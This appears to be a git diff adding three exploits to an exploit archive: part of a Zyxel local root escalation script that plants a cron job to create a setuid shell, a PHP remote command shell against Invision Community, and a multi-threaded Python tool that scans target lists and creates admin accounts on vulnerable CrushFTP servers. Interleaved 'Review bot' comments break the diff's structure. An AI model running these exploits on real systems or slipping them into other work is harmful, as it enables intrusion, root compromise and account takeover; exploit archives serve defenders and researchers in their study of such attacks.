/etc/cron.d/runme +# -rw-rw-rw- 1 root postgres 79 Feb 14 15:52 /etc/cron.d/runme +# $ cat /etc/cron.d/runme +# * * * * * cp /bin/sh /tmp/pwned; chmod 4755 /tmp/pwned; rm /etc/cron.d/runme +# +# [+] Run the shell as follows to bypass bash checks: /tmp/pwned -p +# +# [about one hour later...] +# +# $ ls -l /tmp/pwned +# -rwsr-xr-x 1 root root 916608 Feb 14 16:25 /tmp/pwned +# $ /tmp/pwned -p +# # id +# uid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres) +# # R00t D4nc3!!!111! 
\o/ +# ``` +# +# ## Tested on +# +# * Zyxel FLEX100H with Firmware V1.31(ABXF.0) | 2025-01-09 04:35:47 +# * Zyxel FLEX200H with Firmware V1.31(ABWV.0) | 2025-01-09 05:11:31 +# +# *Note: other products and firmware versions may also be vulnerable.* +# +# ## Special thanks +# +# * Alessandro Sgreccia (@rainpwn) of HackerHood for his research and devices +# + +echo "raptor_fermion - Zyxel fermion-wrapper root LPE exploit" +echo "Copyright (c) 2025 Marco Ivaldi " +echo + +target="/usr/sbin/fermion-wrapper" +tmpfile="/tmp/register_status" +runme="/etc/cron.d/runme" +shell="/tmp/pwned" + +echo "[*] Exploiting $target" +echo "$ uname -a" +uname -a +echo "$ id" +id +echo "$ ls -l $target" +ls -l $target + +umask 0 +rm $tmpfile +ln -s $runme /tmp/register_status +$target register-status +echo "* * * * * cp /bin/sh $shell; chmod 4755 $shell; rm $runme" > $runme + +if [ "`cat $runme 2>/dev/null`" = "" ]; then + echo "[!] Error: something went wrong ¯\\_(ツ)_/¯" + exit 1 +fi + +echo +echo "[+] Everything looks good \\o/, wait an hour and check $shell" +echo "$ ls -l $runme" +ls -l $runme +echo "$ cat $runme" +cat $runme + +echo +echo "[+] Run the shell as follows to bypass bash checks: $shell -p" +echo \ No newline at end of file diff --git a/exploits/multiple/remote/52294.php b/exploits/multiple/remote/52294.php new file mode 100644 index 000000000..4735198ee --- /dev/null +++ b/exploits/multiple/remote/52294.php 
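Review bot: The vendor link in the `# Version:` header is broken by quoted-printable soft line breaks — the trailing `=` on `...zyxel-security-=` and `...privilege-managem=`, plus `=3D` standing in for a literal `=` — so the URL as committed is not a working link and those five header lines should be re-joined into a single line before the entry is published. The `#!/bin/sh` line sits after the Exploit-DB header comments rather than on line 1, so it is only a comment there and the interpreter the script was written for is not enforced; the header would be the place to state the intended shell, e.g. `# Interpreter: /bin/sh (shebang is not on line 1 because of the DB header)`. The `# Tested on:` value is likewise wrapped across two lines by the same encoding and should be one line.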
@@ -0,0 +1,56 @@ +\n"; + print "\nExample....: php $argv[0] http://localhost/invision/"; + print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n"; + die(); +} + +$ch = curl_init(); + +$params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"]; + +curl_setopt($ch, CURLOPT_URL, $argv[1]); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); +curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); +curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); + +while (1) +{ + print "\ninvision-shell# "; + if (($cmd = trim(fgets(STDIN))) == "exit") break; + $params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd)); + curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); + preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n"); +} \ No newline at end of file diff --git a/exploits/multiple/remote/52295.py b/exploits/multiple/remote/52295.py new file mode 100755 index 000000000..64d91eb72 --- /dev/null +++ b/exploits/multiple/remote/52295.py 
@@ -0,0 +1,609 @@
+# Exploit Title: CrushFTP 11.3.1 - Authentication Bypass
+# Date: 2025-05-15
+# Exploit Author: @İbrahimsql
+# Exploit Author's github: https://github.com/ibrahimsql
+# Vendor Homepage: https://www.crushftp.com
+# Software Link: https://www.crushftp.com/download.html
+# Version: < 10.8.4, < 11.3.1
+# Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1
+# CVE: CVE-2025-31161
+# Description:
+# CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover
+# through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism.
+# Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin).
+
+# Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import argparse
+import concurrent.futures
+import json
+import logging
+import os
+import random
+import re
+import socket
+import string
+import sys
+import time
+from datetime import datetime
+from typing import Dict, List, Optional, Tuple, Union
+
+import requests
+import urllib3
+from colorama import Fore, Style, init
+from prettytable import PrettyTable
+from rich.console import Console
+from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn
+
+# Initialize colorama
+init(autoreset=True)
+
+# Disable SSL warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# Initialize Rich console
+console = Console()
+
+# Global variables
+VERSION = "2.0.0"
+USER_AGENTS = [
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
+ "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0",
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15",
+ "Mozilla/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit/601.13 (KHTML, like Gecko) Chrome/53.0.2198.319 Safari/601.5 Edge/15.63524",
+ "Mozilla/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit/602.15 (KHTML, like Gecko) Chrome/47.0.1044.126 Safari/533.2 Edge/9.25098",
+ "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident/4.0)",
+ "Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/49.0.1015.193 Mobile Safari/600.9"
+]
+
+# Banner
+BANNER = fr"""
+{Fore.CYAN}
+ / ____/______ _______/ /_ / ____/ /_____
+ / / / ___/ / / / ___/ __ \/ /_ / __/ __ \
+/ /___/ / / /_/ (__ ) / / / __/ / /_/ /_/ /
+\____/_/ \__,_/____/_/ /_/_/ \__/ .___/
+ /_/
+{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql
+{Style.RESET_ALL}
+"""
+
+# Setup logging
+def setup_logging(log_level: str, log_file: Optional[str] = None) -> None:
+ """Configure logging based on specified level and output file."""
+ numeric_level = getattr(logging, log_level.upper(), None)
+ if not isinstance(numeric_level, int):
+ raise ValueError(f"Invalid log level: {log_level}")
+
+ log_format = "%(asctime)s - %(levelname)s - %(message)s"
+ handlers = []
+
+ if log_file:
+ handlers.append(logging.FileHandler(log_file))
+
+ handlers.append(logging.StreamHandler())
+
+ logging.basicConfig(
+ level=numeric_level,
+ format=log_format,
+ handlers=handlers
+ )
+
+class TargetManager:
+ """Manages target hosts and related operations."""
+
+ def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None):
+ self.targets = []
+ self.vulnerable_targets = []
+ self.exploited_targets = []
+
+ if target_file:
+ self.load_targets_from_file(target_file)
+ elif single_target:
+ self.add_target(single_target)
+
+ def load_targets_from_file(self, filename: str) -> None:
+ """Load targets from a file."""
+ try:
+ with open(filename, "r") as f:
+ self.targets = [line.strip() for line in f if line.strip()]
+
+ if not self.targets:
+ logging.warning(f"Target file '(unknown)' is empty or contains only whitespace.")
+ else:
+ logging.info(f"Loaded {len(self.targets)} targets from (unknown)")
+ except FileNotFoundError:
+ logging.error(f"Target file '(unknown)' not found.")
+ sys.exit(1)
+ except Exception as e:
+ logging.error(f"Error loading targets: {e}")
+ sys.exit(1)
+
+ def add_target(self, target: str) -> None:
+ """Add a single target."""
+ if target not in self.targets:
+ self.targets.append(target)
+
+ def mark_as_vulnerable(self, target: str) -> None:
+ """Mark a target as vulnerable."""
+ if target not in self.vulnerable_targets:
+ self.vulnerable_targets.append(target)
+
+ def mark_as_exploited(self, target: str) -> None:
+ """Mark a target as successfully exploited."""
+ if target not in self.exploited_targets:
+ self.exploited_targets.append(target)
+
+ def save_results(self, output_file: str, format_type: str = "txt") -> None:
+ """Save scan results to a file."""
+ try:
+ if format_type.lower() == "json":
+ results = {
+ "scan_time": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
+ "total_targets": len(self.targets),
+ "vulnerable_targets": self.vulnerable_targets,
+ "exploited_targets": self.exploited_targets
+ }
+
+ with open(output_file, "w") as f:
+ json.dump(results, f, indent=4)
+
+ elif format_type.lower() == "csv":
+ with open(output_file, "w") as f:
+ f.write("target,vulnerable,exploited\n")
+ for target in self.targets:
+ vulnerable = "Yes" if target in self.vulnerable_targets else "No"
+ exploited = "Yes" if target in self.exploited_targets else "No"
+ f.write(f"{target},{vulnerable},{exploited}\n")
+
+ else: # Default to txt
+ with open(output_file, "w") as f:
+ f.write(f"Scan Results - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
+ f.write(f"Total Targets: {len(self.targets)}\n")
+ f.write(f"Vulnerable Targets: {len(self.vulnerable_targets)}\n")
+ f.write(f"Exploited Targets: {len(self.exploited_targets)}\n\n")
+
+ f.write("Vulnerable Targets:\n")
+ for target in self.vulnerable_targets:
+ f.write(f"- {target}\n")
+
+ f.write("\nExploited Targets:\n")
+ for target in self.exploited_targets:
+ f.write(f"- {target}\n")
+
+ logging.info(f"Results saved to {output_file}")
+
+ except Exception as e:
+ logging.error(f"Error saving results: {e}")
+
+class ExploitEngine:
+ """Core engine for vulnerability checking and exploitation."""
+
+ def __init__(self, target_manager: TargetManager, config: Dict):
+ self.target_manager = target_manager
+ self.config = config
+ self.session = self._create_session()
+
+ def _create_session(self) -> requests.Session:
+ """Create and configure a requests session."""
+ session = requests.Session()
+ session.verify = False
+
+ # Set proxy if configured
+ if self.config.get("proxy"):
+ session.proxies = {
+ "http": self.config["proxy"],
+ "https": self.config["proxy"]
+ }
+
+ # Set custom headers
+ session.headers.update({
+ "User-Agent": random.choice(USER_AGENTS),
+ "Connection": "close",
+ })
+
+ return session
+
+ def check_vulnerability(self, target_host: str) -> bool:
+ """Check if target is vulnerable to CVE-2025-31161."""
+ port = self.config.get("port", 443)
+ timeout = self.config.get("timeout", 10)
+
+ headers = {
+ "Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
+ "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
+ }
+
+ # Add custom headers if provided
+ if self.config.get("custom_headers"):
+ headers.update(self.config["custom_headers"])
+
+ try:
+ protocol = "https" if port == 443 else "http"
+ url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
+
+ response = self.session.get(
+ url,
+ headers=headers,
+ timeout=timeout
+ )
+
+ if response.status_code == 200:
+ # Additional validation
+ if self.config.get("deep_check", False):
+ # Look for specific patterns in the response that confirm vulnerability
+ if "CrushFTP" in response.text or "WebInterface" in response.text:
+ self.target_manager.mark_as_vulnerable(target_host)
+ if self.config.get("verbose", False):
+ console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
+ return True
+ else:
+ if self.config.get("verbose", False):
+ console.print(f"[yellow][?][/yellow] {target_host} returned 200 but may not be vulnerable")
+ return False
+ else:
+ # Simple check based on status code
+ self.target_manager.mark_as_vulnerable(target_host)
+ if self.config.get("verbose", False):
+ console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
+ return True
+ else:
+ if self.config.get("verbose", False):
+ console.print(f"[red][-][/red] {target_host} is not vulnerable (Status: {response.status_code})")
+ return False
+
+ except requests.exceptions.ConnectionError:
+ if self.config.get("verbose", False):
+ console.print(f"[red][-][/red] {target_host} - Connection error")
+ except requests.exceptions.Timeout:
+ if self.config.get("verbose", False):
+ console.print(f"[red][-][/red] {target_host} - Connection timeout")
+ except requests.exceptions.RequestException as e:
+ if self.config.get("verbose", False):
+ console.print(f"[red][-][/red] {target_host} - Request error: {e}")
+ except Exception as e:
+ if self.config.get("verbose", False):
+ console.print(f"[red][-][/red] {target_host} - Error: {e}")
+
+ return False
+
+ def exploit(self, target_host: str) -> bool:
+ """Exploit the vulnerability on the target host."""
+ port = self.config.get("port", 443)
+ timeout = self.config.get("timeout", 10)
+ target_user = self.config.get("target_user", "crushadmin")
+ new_user = self.config.get("new_user")
+ password = self.config.get("password")
+
+ if not new_user or not password:
+ logging.error("New user and password are required for exploitation")
+ return False
+
+ headers = {
+ "Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
+ "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
+ "Connection": "close",
+ }
+
+ # Add custom headers if provided
+ if self.config.get("custom_headers"):
+ headers.update(self.config["custom_headers"])
+
+ # Generate a timestamp for the created_time field
+ timestamp = int(time.time() * 1000)
+
+ # Build the payload with more comprehensive user permissions
+ payload = {
+ "command": "setUserItem",
+ "data_action": "replace",
+ "serverGroup": "MainUsers",
+ "username": new_user,
+ "user": f'''
+
+ {new_user}
+ {password}
+
+ 1.0
+ /
+ 6
+ 0
+ (SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)
+ {target_user}
+
+ {timestamp}
+
+ true
+''',
+ "xmlItem": "user",
+ "vfs_items": '',
+ "permissions": '(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)',
+ "c2f": "31If"
+ }
+
+ try:
+ protocol = "https" if port == 443 else "http"
+ url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
+
+ response = self.session.post(
+ url,
+ headers=headers,
+ data=payload,
+ timeout=timeout
+ )
+
+ if response.status_code == 200:
+ # Verify the user was actually created
+ if self.config.get("verify_exploit", True):
+ if self._verify_user_created(target_host, new_user):
+ self.target_manager.mark_as_exploited(target_host)
+ console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
+ return True
+ else:
+ console.print(f"[yellow][!][/yellow] User creation appeared successful but verification failed on {target_host}")
+ return False
+ else:
+ self.target_manager.mark_as_exploited(target_host)
+ console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
+ return True
+ else:
+ console.print(f"[red][-][/red] Failed to create user on {target_host} (Status: {response.status_code})")
+ return False
+
+ except Exception as e:
+ console.print(f"[red][-][/red] Error exploiting {target_host}: {e}")
+ return False
+
+ def _verify_user_created(self, target_host: str, username: str) -> bool:
+ """Verify that the user was successfully created."""
+ # This is a placeholder for actual verification logic
+ # In a real implementation, you would check if the user exists
+ # For now, we'll just return True
+ return True
+
+ def scan_targets(self) -> None:
+ """Scan all targets for vulnerability."""
+ targets = self.target_manager.targets
+ threads = self.config.get("threads", 10)
+
+ if not targets:
+ logging.error("No targets specified")
+ return
+
+ console.print(f"[bold cyan]Scanning {len(targets)} targets with {threads} threads...[/bold cyan]")
+
+ with Progress(
+ TextColumn("[progress.description]{task.description}"),
+ BarColumn(),
+ TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
+ TextColumn("({task.completed}/{task.total})"),
+ TimeRemainingColumn(),
+ console=console
+ ) as progress:
+ task = progress.add_task("[cyan]Scanning targets...", total=len(targets))
+
+ with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
+ future_to_target = {executor.submit(self.check_vulnerability, target): target for target in targets}
+
+ for future in concurrent.futures.as_completed(future_to_target):
+ progress.update(task, advance=1)
+
+ # Display results
+ vulnerable_count = len(self.target_manager.vulnerable_targets)
+ console.print(f"\n[bold green]Scan complete![/bold green] Found {vulnerable_count} vulnerable targets.")
+
+ if vulnerable_count > 0 and self.config.get("verbose", False):
+ console.print("\n[bold cyan]Vulnerable Targets:[/bold cyan]")
+ for target in self.target_manager.vulnerable_targets:
+ console.print(f"[green]→[/green] {target}")
+
+ def exploit_targets(self) -> None:
+ """Exploit vulnerable targets."""
+ targets = self.target_manager.vulnerable_targets if self.config.get("only_vulnerable", True) else self.target_manager.targets
+ threads = self.config.get("threads", 5) # Use fewer threads for exploitation
+
+ if not targets:
+ logging.error("No targets to exploit")
+ return
+
+ console.print(f"[bold red]Exploiting {len(targets)} targets with {threads} threads...[/bold red]")
+
+ with Progress(
+ TextColumn("[progress.description]{task.description}"),
+ BarColumn(),
+ TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
+ TextColumn("({task.completed}/{task.total})"),
+ TimeRemainingColumn(),
+ console=console
+ ) as progress:
+ task = progress.add_task("[red]Exploiting targets...", total=len(targets))
+
+ with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
+ future_to_target = {executor.submit(self.exploit, target): target for target in targets}
+
+ for future in concurrent.futures.as_completed(future_to_target):
+ progress.update(task, advance=1)
+
+ # Display results
+ exploited_count = len(self.target_manager.exploited_targets)
+ console.print(f"\n[bold green]Exploitation complete![/bold green] Successfully exploited {exploited_count}/{len(targets)} targets.")
+
+ if exploited_count > 0:
+ console.print("\n[bold cyan]Exploited Targets:[/bold cyan]")
+ for target in self.target_manager.exploited_targets:
+ console.print(f"[green]→[/green] {target}")
+
+def parse_arguments() -> argparse.Namespace:
+ """Parse command line arguments."""
+ parser = argparse.ArgumentParser(
+ description="CVE-2025-31161 Exploit Framework - Advanced CrushFTP WebInterface Vulnerability Scanner and Exploiter",
+ formatter_class=argparse.RawDescriptionHelpFormatter,
+ epilog="""
+Examples:
+ # Check a single target for vulnerability
+ python cve_2025_31161.py --target example.com --check
+
+ # Exploit a vulnerable target
+ python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd
+
+ # Scan multiple targets from a file
+ python cve_2025_31161.py --file targets.txt --check --threads 20
+
+ # Scan and automatically exploit vulnerable targets
+ python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit
+
+ # Export results to JSON format
+ python cve_2025_31161.py --file targets.txt --check --output results.json --format json
+ """
+ )
+
+ # Target specification
+ target_group = parser.add_argument_group("Target Specification")
+ target_group.add_argument("--target", help="Single target host to scan/exploit")
+ target_group.add_argument("--file", help="File containing list of targets (one per line)")
+ target_group.add_argument("--port", type=int, default=443, help="Target port (default: 443)")
+
+ # Actions
+ action_group = parser.add_argument_group("Actions")
+ action_group.add_argument("--check", action="store_true", help="Check targets for vulnerability")
+ action_group.add_argument("--exploit", action="store_true", help="Exploit vulnerable targets")
+ action_group.add_argument("--auto-exploit", action="store_true", help="Automatically exploit targets found to be vulnerable during check")
+
+ # Exploitation options
+ exploit_group = parser.add_argument_group("Exploitation Options")
+ exploit_group.add_argument("--target-user", default="crushadmin", help="Target user for exploitation (default: crushadmin)")
+ exploit_group.add_argument("--new-user", help="Username for the new admin account to create")
+ exploit_group.add_argument("--password", help="Password for the new admin account")
+ exploit_group.add_argument("--verify-exploit", action="store_true", help="Verify successful exploitation (default: True)")
+
+ # Scan options
+ scan_group = parser.add_argument_group("Scan Options")
+ scan_group.add_argument("--threads", type=int, default=10, help="Number of concurrent threads (default: 10)")
+ scan_group.add_argument("--timeout", type=int, default=10, help="Connection timeout in seconds (default: 10)")
+ scan_group.add_argument("--deep-check", action="store_true", help="Perform deeper vulnerability checks")
+ scan_group.add_argument("--only-vulnerable", action="store_true", help="Only exploit targets that were found vulnerable")
+
+ # Output options
+ output_group = parser.add_argument_group("Output Options")
+ output_group.add_argument("--output", help="Output file for results")
+ output_group.add_argument("--format", choices=["txt", "json", "csv"], default="txt", help="Output format (default: txt)")
+ output_group.add_argument("--verbose", "-v", action="store_true", help="Enable verbose output")
+ output_group.add_argument("--quiet", "-q", action="store_true", help="Suppress all output except errors")
+ output_group.add_argument("--log-file", help="Log file to write to")
+ output_group.add_argument("--log-level", choices=["debug", "info", "warning", "error", "critical"], default="info", help="Log level (default: info)")
+
+ # Advanced options
+ advanced_group = parser.add_argument_group("Advanced Options")
+ advanced_group.add_argument("--proxy", help="Proxy to use for requests (e.g., http://127.0.0.1:8080)")
+ advanced_group.add_argument("--user-agent", help="Custom User-Agent string")
+ advanced_group.add_argument("--random-agent", action="store_true", help="Use a random User-Agent for each request")
+ advanced_group.add_argument("--delay", type=float, help="Delay between requests in seconds")
+ advanced_group.add_argument("--custom-headers", help="Custom headers as JSON string")
+
+ return parser.parse_args()
+
+def validate_args(args: argparse.Namespace) -> bool:
+ """Validate command line arguments."""
+ # Check if at least one target specification is provided
+ if not args.target and not args.file:
+ logging.error("No target specified. Use --target or --file")
+ print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
+ print(f" python {sys.argv[0]} --file example_targets.txt --check")
+ return False
+
+ # Check if at least one action is specified
+ if not args.check and not args.exploit:
+ logging.error("No action specified. Use --check or --exploit")
+ print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
+ print(f" python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
+ return False
+
+ # If exploit action is specified, check for required parameters
+ if args.exploit and (not args.new_user or not args.password):
+ logging.error("Exploitation requires --new-user and --password")
+ print(f"\nExample usage: python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
+ return False
+
+ return True
+
+def main() -> None:
+ """Main function."""
+ # Parse command line arguments
+ args = parse_arguments()
+
+ # Configure logging
+ log_level = "error" if args.quiet else args.log_level
+ setup_logging(log_level, args.log_file)
+
+ # Display banner
+ if not args.quiet:
+ console.print(BANNER)
+
+ # Validate arguments
+ if not validate_args(args):
+ sys.exit(1)
+
+ # Create target manager
+ target_manager = TargetManager(args.file, args.target)
+
+ # Build configuration dictionary
+ config = {
+ "port": args.port,
+ "threads": args.threads,
+ "timeout": args.timeout,
+ "verbose": args.verbose,
+ "deep_check": args.deep_check,
+ "target_user": args.target_user,
+ "new_user": args.new_user,
+ "password": args.password,
+ "only_vulnerable": args.only_vulnerable,
+ "verify_exploit": args.verify_exploit,
+ "proxy": args.proxy,
+ }
+
+ # Add custom headers if provided
+ if args.custom_headers:
+ try:
+ config["custom_headers"] = json.loads(args.custom_headers)
+ except json.JSONDecodeError:
+ logging.error("Invalid JSON format for custom headers")
+ sys.exit(1)
+
+ # Add custom user agent if provided
+ if args.user_agent:
+ config["user_agent"] = args.user_agent
+
+ # Create exploit engine
+ engine = ExploitEngine(target_manager, config)
+
+ # Perform actions
+ if args.check:
+ engine.scan_targets()
+
+ if args.exploit or (args.auto_exploit and target_manager.vulnerable_targets):
+ engine.exploit_targets()
+
+ # Save results if output file is specified
+ if args.output:
+ target_manager.save_results(args.output, args.format)
+
+ # Display summary
+ if not args.quiet:
+ console.print("\n[bold green]Summary:[/bold green]")
+ console.print(f"Total targets: {len(target_manager.targets)}")
+ console.print(f"Vulnerable targets: {len(target_manager.vulnerable_targets)}")
+ console.print(f"Exploited targets: {len(target_manager.exploited_targets)}")
+
+if __name__ == "__main__":
+ try:
+ main()
+ except KeyboardInterrupt:
+ console.print("\n[bold red]Operation cancelled by user[/bold red]")
+ sys.exit(0)
+ except Exception as e:
+ logging.error(f"Unhandled exception: {e}")
+ sys.exit(1)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8b57329d3..592e4bab1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
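Review bot: `_verify_user_created` is a stub that always returns True, so the `verify_exploit` branch in `exploit` marks a target as exploited and prints "Successfully created user" on any HTTP 200 without confirming anything, and `--verify-exploit` (a `store_true` flag, so its real default is False despite the help text saying True) changes nothing in practice. The JSON, CSV and TXT files written by `save_results` therefore report "Exploited" for unverified targets, which overstates results for anyone who relies on them. Until verification exists the stub's docstring should say so, e.g. `"""Placeholder: verification is not implemented and always returns True; 'exploited' status is unverified."""`, and the success message should be worded as unverified. Separately, `--user-agent`, `--random-agent` and `--delay` are parsed but never consulted by `_create_session` or the request paths (`_create_session` always picks `random.choice(USER_AGENTS)`), so the help text promises options that have no effect.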
@@ -10609,6 +10609,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,,
 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz,
 52279,exploits/multiple/local/52279.py,"ZTE ZXV10 H201L - RCE via authentication bypass",2025-05-01,"tasos meletlidis",local,multiple,,2025-05-01,2025-05-01,0,,,,,,
+52293,exploits/multiple/local/52293.bash,"Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation",2025-05-18,"Marco Ivaldi",local,multiple,,2025-05-18,2025-05-18,0,CVE-2025-1731,,,,,
 32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info
 24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info
 22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",remote,multiple,,2003-04-11,2012-11-05,1,OSVDB-50428,,,,,https://www.securityfocus.com/bid/7355/info
@@ -10865,6 +10866,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9039,exploits/multiple/remote/9039.txt,"cPanel - (Authenticated) 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,remote,multiple,,2009-06-28,2016-12-30,1,OSVDB-55515;CVE-2009-2275,,,,,
 21444,exploits/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0787;OSVDB-9240,,,,,https://www.securityfocus.com/bid/4717/info
 21445,exploits/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0786;OSVDB-14438,,,,,https://www.securityfocus.com/bid/4718/info
+52295,exploits/multiple/remote/52295.py,"CrushFTP 11.3.1 - Authentication Bypass",2025-05-18,İbrahimsql,remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-31161,,,,,
 52012,exploits/multiple/remote/52012.py,"CrushFTP < 11.1.0 - Directory Traversal",2024-05-13,"Abdualhadi khalifa",remote,multiple,,2024-05-13,2024-05-13,0,,,,,,
 38636,exploits/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",remote,multiple,,2012-11-07,2015-11-05,1,CVE-2013-2261;OSVDB-95000,,,,,https://www.securityfocus.com/bid/61090/info
 38637,exploits/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",remote,multiple,,2015-11-07,2015-11-05,1,CVE-2013-4103;OSVDB-95007,,,,,https://www.securityfocus.com/bid/61093/info
@@ -11078,6 +11080,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43385,exploits/multiple/remote/43385.py,"Intel Active Management Technology - System Privileges",2017-05-10,nixawk,remote,multiple,16992,2017-12-21,2018-01-08,0,CVE-2017-5689,,,,,https://github.com/nixawk/labs/tree/d7e879222d058f8b87b7681342834470ab4ba536/CVE-2017-5689
 38633,exploits/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",remote,multiple,,2013-07-02,2015-11-05,1,CVE-2013-4786;OSVDB-95057,,,,,https://www.securityfocus.com/bid/61076/info
 22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",remote,multiple,,2003-04-05,2012-11-03,1,,,,,,https://www.securityfocus.com/bid/7291/info
+52294,exploits/multiple/remote/52294.php,"Invision Community 5.0.6 - Remote Code Execution (RCE)",2025-05-18,"Egidio Romano",remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-47916,,,,,https://karmainsecurity.com/pocs/CVE-2025-47916.php
 22662,exploits/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 - HTML Attachment Cross-Site Scripting",2003-05-27,KernelPanikLabs,remote,multiple,,2003-05-27,2012-11-13,1,OSVDB-4637,,,,,https://www.securityfocus.com/bid/7704/info
 21603,exploits/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",remote,multiple,,2002-07-09,2012-09-29,1,CVE-2002-1042;OSVDB-846,,,,,https://www.securityfocus.com/bid/5191/info
